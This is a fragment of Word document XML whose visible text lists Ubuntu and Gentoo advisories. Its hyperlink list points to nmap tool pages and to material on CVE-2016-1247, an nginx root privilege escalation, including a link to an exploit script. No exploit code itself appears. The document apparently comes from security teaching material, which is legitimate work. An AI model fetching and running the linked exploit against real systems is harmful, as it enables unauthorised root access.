      </w:pPr>
    </w:p>
    <w:p w14:paraId="5549A4AF" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ubuntu security:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053FAC23" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="006A1C0F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId47" w:history="1">
        <w:r w:rsidR="00673F7F" w:rsidRPr="002B24A4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://www.ubuntu.com/usn/usn-3114-1/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="76BB7707" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10D25037" w14:textId="77777777" w:rsidR="00673F7F" w:rsidRPr="002B24A4" w:rsidRDefault="00673F7F" w:rsidP="00673F7F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Gentoo security advisory (also affected):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5C0D71" w14:textId="77777777" w:rsidR="00BC6BAE" w:rsidRPr="002B24A4" w:rsidRDefault="006A1C0F" w:rsidP="00CD7DD6">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId48" w:history="1">
        <w:r w:rsidR="00673F7F" w:rsidRPr="002B24A4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://security.gentoo.org/glsa/201701-22</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:sectPr w:rsidR="00BC6BAE" w:rsidRPr="002B24A4" w:rsidSect="00DC0E66">
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="630" w:right="540" w:bottom="99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DA5095"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="263AF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E73"/>
    <w:rsid w:val="00032B69"/>
    <w:rsid w:val="00065DDE"/>
    <w:rsid w:val="000C69E2"/>
    <w:rsid w:val="000D228D"/>
    <w:rsid w:val="0019173E"/>
    <w:rsid w:val="002037FC"/>
    <w:rsid w:val="00204651"/>
    <w:rsid w:val="002350DA"/>
    <w:rsid w:val="00254A81"/>
    <w:rsid w:val="002B24A4"/>
    <w:rsid w:val="004413C9"/>
    <w:rsid w:val="004647AC"/>
    <w:rsid w:val="00482AD6"/>
    <w:rsid w:val="0057440B"/>
    <w:rsid w:val="00581648"/>
    <w:rsid w:val="005C7CA3"/>
    <w:rsid w:val="006118D8"/>
    <w:rsid w:val="00673F7F"/>
    <w:rsid w:val="006A1C0F"/>
    <w:rsid w:val="00825E73"/>
    <w:rsid w:val="00857847"/>
    <w:rsid w:val="0092704C"/>
    <w:rsid w:val="00A31F62"/>
    <w:rsid w:val="00A627C8"/>
    <w:rsid w:val="00AD4DF4"/>
    <w:rsid w:val="00BC6BAE"/>
    <w:rsid w:val="00C06271"/>
    <w:rsid w:val="00CD7DD6"/>
    <w:rsid w:val="00D67F91"/>
    <w:rsid w:val="00DB7B1D"/>
    <w:rsid w:val="00DC0E66"/>
    <w:rsid w:val="00FA403C"/>
    <w:rsid w:val="00FA772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C3DEB"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{6F18128E-75AB-4987-87BB-0B48ADAD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54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4A8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54A81"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A627C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A31F62"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="NoSpacingChar">
    <w:name w:val="No Spacing Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="NoSpacing"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="00A31F62"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="PlainText">
    <w:name w:val="Plain Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="PlainTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00AD4DF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D4DF4"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyText">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyTextChar"/>
    <w:rsid w:val="00AD4DF4"/>
    <w:pPr>
      <w:spacing w:after="140" w:line="288" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Serif" w:eastAsia="DejaVu Sans" w:hAnsi="Liberation Serif" w:cs="FreeSans"/>
      <w:color w:val="00000A"/>
      <w:kern w:val="2"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-IN" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyTextChar">
    <w:name w:val="Body Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BodyText"/>
    <w:rsid w:val="00AD4DF4"/>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Serif" w:eastAsia="DejaVu Sans" w:hAnsi="Liberation Serif" w:cs="FreeSans"/>
      <w:color w:val="00000A"/>
      <w:kern w:val="2"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>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14268">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="902259725">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="931550803">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="974263881">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1494837787">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1528837234">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="186524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map.org/movies/"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yperlink" Target="https://www.ubuntu.com/usn/usn-3114-1/" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://security.gentoo.org/glsa/201701-22" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://legalhackers.com/videos/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://legalhackers.com/exploits/CVE-2016-1247/nginxed-root.sh" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ubuntu.com/usn/usn-3114-1/" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nmap.org/zenmap/"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2.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nmap.org/movies/" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/dawid_golunski" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://security.gentoo.org/glsa/201701-22" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://legalhackers.com/" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.debian.org/security/2016/dsa-3701" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nmap.org/movi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localhost/" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nmap.org/nping/" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://legalhackers.com/" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://legalhackers.com/videos/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nmap.org/ndiff/" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nmap.org/movie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legalhackers.com/" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1247" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://security.gentoo.org/glsa/201701-22" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nmap.org/ncat/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nmap.org/movies/"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legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.debian.org/security/2016/dsa-3701" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://security-tracker.debian.org/tracker/CVE-2016-1247" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nginx.org/en/" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item1.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nmap.org/data/COPY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9CD38-8D9E-47DE-B770-8EC9160C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0</Pages>
  <Words>3746</Words>
  <Characters>2135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 jaiswal</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Parmjeet Singh</cp:lastModifiedBy>
  <cp:revision>42</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-07-11T12:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-06-07T06:17:00Z</dcterms:modified>
</cp:coreProperties>
</file>